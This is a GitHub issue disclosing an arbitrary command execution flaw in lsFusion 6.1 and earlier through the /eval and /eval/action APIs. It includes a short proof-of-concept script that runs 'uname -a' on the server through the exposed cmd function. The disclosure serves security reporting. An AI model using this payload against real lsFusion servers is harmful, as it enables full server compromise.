-
Notifications
You must be signed in to change notification settings - Fork 40
Vulnerability: Arbitrary Command Execution in lsFusion ≤ 6.1 #1546
Copy link
Copy link
Open
Description
BUG_Author: R1ckyZ
Affected Version: lsFusion ≤ 6.1
Vendor: lsfusion GitHub Repository
Software: lsfusion
Vulnerability Files:
server/src/main/java/lsfusion/server/physics/admin/interpreter/action/RunCommandAction.java
Description:
The client accesses the server via the /eval/action and /eval APIs. An authorized user can pass a script parameter to execute scripts. The server exposes functions for command execution, file reading, and file writing. An authorized user can therefore execute arbitrary commands, effectively gaining full access to the server.
Proof of Concept:
- Access the API
/eval/actionand pass in the following script value:
{cmd('uname -a', NULL, NULL, TRUE ); }
EXPORT FROM cmdOut[]();
- Alternatively, access the API
/evaland pass in the following script value:
run() {
cmd('uname -a', NULL, NULL, TRUE );
EXPORT FROM cmdOut[]();
}

Reactions are currently unavailable
Metadata
Metadata
Assignees
Labels
No labels